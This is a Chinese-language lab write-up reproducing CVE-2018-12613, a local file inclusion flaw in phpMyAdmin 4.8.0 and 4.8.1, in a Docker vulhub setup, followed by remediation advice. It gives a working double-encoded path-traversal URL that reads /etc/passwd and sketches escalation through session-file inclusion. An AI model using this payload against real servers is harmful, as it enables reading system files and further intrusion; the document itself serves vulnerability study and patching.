PhpMyAdmin文件包含漏洞

目录

漏洞描述

漏洞复现

复现

解决方法


漏洞描述

PhpMyAdmin 是一个用 PHP 编写的免费软件工具,旨在通过 Web 处理 MySQL 的管理。该漏洞在index.php中,导致文件包含漏洞。

在phpMyadmin4.8.x版本中,程序没有严格控制用户的输入,攻击者可以利用双重编码绕过程序的白名单限制,造成 LFI(本地文件包含)漏洞。

受影响的系统版本为phpMyadmin4.8.0和phpMyadmin4.8.1。漏洞编号 CVE-2018-12613。

漏洞复现

    使用docker搭建vulhub平台,

运行以下命令启动phpMyadmin4.8.1

docker-compose up -d

环境启动后,访问http://your-ip:8080. phpmyadmin 是“config”模式,所以我们可以直接登录。

复现

访问地址

http://ip:8080

显示结果:

PhpMyAdmin文件包含漏洞_第1张图片

访问地址

http://ip:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

结果表明存在文件包含漏洞:

PhpMyAdmin文件包含漏洞_第2张图片

我们可以执行SELECT '';,

PhpMyAdmin文件包含漏洞_第3张图片 

检查session id(cookie 中phpMyAdmin的值)

PhpMyAdmin文件包含漏洞_第4张图片

包含 session 文件:

PhpMyAdmin文件包含漏洞_第5张图片

解决方法

  1. 更新phpmyadmin版本。
  2. 删除index.php中使用文件包含的函数。
  3. 进行输入转码和过滤拦截敏感字符。
  4. 安装杀毒软件,开启防火墙拦截异常行为。

你可能感兴趣的:(php,安全,web安全)